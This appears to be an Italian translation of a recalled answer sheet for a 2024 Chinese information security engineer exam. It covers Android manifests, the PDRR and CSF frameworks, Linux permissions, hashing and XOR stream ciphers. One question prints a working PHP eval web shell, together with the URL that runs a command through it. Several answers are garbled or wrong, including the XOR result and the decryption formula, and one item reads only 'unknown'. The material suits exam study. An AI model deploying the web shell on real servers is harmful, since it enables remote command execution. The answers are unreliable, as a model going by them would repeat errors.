
Ingegnere della Sicurezza Informatica 2024、2024InformationSecurityEngineer
Ingegnere della Sicurezza Informatica 2024, 2024InformationSecurityEngineer
Esame di qualificazione software - Data dell'esame : 2024年11月08日
Directory/file in cui è archiviata la firma ___ (2 punti) Risposta: META-INF
Directory/file in cui sono archiviati i permessi ___ (2 punti) Risposta: AndroidManifest.xml
Domanda 5 (10 punti) (1)Quale impostazione supporta il backup; (2)Può leggere le informazioni sulla posizione storica: ci sono rischi per la sicurezza; (3)Nel file di configurazione, quali dei quattro componenti principali vengono utilizzati; (4)Quale componente presenta il rischio più elevato di fuga di informazioni; (5)Esiste un uso improprio delle informazioni? Spiegare in dettaglio;
Risposta: (1)backup...... non supporta il backup (2)Esistono rischi: le informazioni sconosciute rischiano di essere divulgate (3)Activity, BroadcastRecevier (4)Contentprovider (5)Esiste un uso improprio delle informazioni: permessi di posizione, fotocamera, archiviazione, contatti, multimedia, Bluetooth, ecc. Molti sono raccolti in modo eccessivo
L'utente in Android ha i permessi di root? (2 punti) Risposta: no
Quale modello di sicurezza ___ (2 punti) Risposta: PDRR
Sconosciuta
Il firewall appartiene a quale funzione principale ___ (2 punti) Risposta: Protezione
Domanda 2 (4 punti) (1)Quale funzione principale in più ha CSF rispetto a PDRR ___ (2 punti) Risposta: Identificazione (2)A quale funzione del CSF appartiene la valutazione del rischio ___ (2 punti) Risposta: Identificazione
Oltre all'identificazione degli asset, quali altre tre identificazioni esistono ___ (3 punti) Risposta: identificazione del rischio; identificazione delle vulnerabilità; identificazione delle misure di sicurezza esistenti
Nome completo di ll ___ (2 punti) Risposta: ls -l
Si è root o utente normale ___ (2 punti) Risposta: root
Rappresentazione numerica dei permessi dei file ___ (2 punti) Risposta: rw-r--r-- 644
Cosa rappresenta ../ nell'immagine ___ (2 punti) Risposta: la directory superiore, /var/www/html
Comandi integrati in Linux per il calcolo di hash ___ (2 punti) md5sum; sha1sum; shasum -a 256
shell.php <?php @eval($_GET["cmd"]); ?> (5 punti)
- Qual è la password di connessione corrispondente al file? Risposta: cmd
- Quale metodo di richiesta HTTP? Risposta: GET
- Supponendo che il dominio sia abc.com, URL di richiesta completo per eseguire whoami Risposta: abc.com/shell.php?cmd=system("whoami")
- Oltre alla crittografia simmetrica e asimmetrica, in base alla modalità di elaborazione del testo in chiaro, come si può crittografare? (2 punti) Risposta: Crittografia a blocchi e crittografia a flusso
- Gli 8 bit di a (2 punti) Risposta: 97 ---》 01100001
- Risultato della crittografia XOR di a e abc (6 punti) Risposta: 032 oppure 00000000 00000011 00000010
- Dati mi, ki, ci, qual è la formula per ottenere il testo in chiaro? (2 punti) Risposta: mi = ki XOR ^ ci
- È sicuro crittografare due testi in chiaro diversi con la stessa chiave del cifrario a flusso? Perché? (2 punti) Risposta: Non è sicuro: da un testo in chiaro si può ricavare l'altro
- Il cifrario a blocchi può essere utilizzato come cifrario a flusso? (1 punto) Risposta: Sì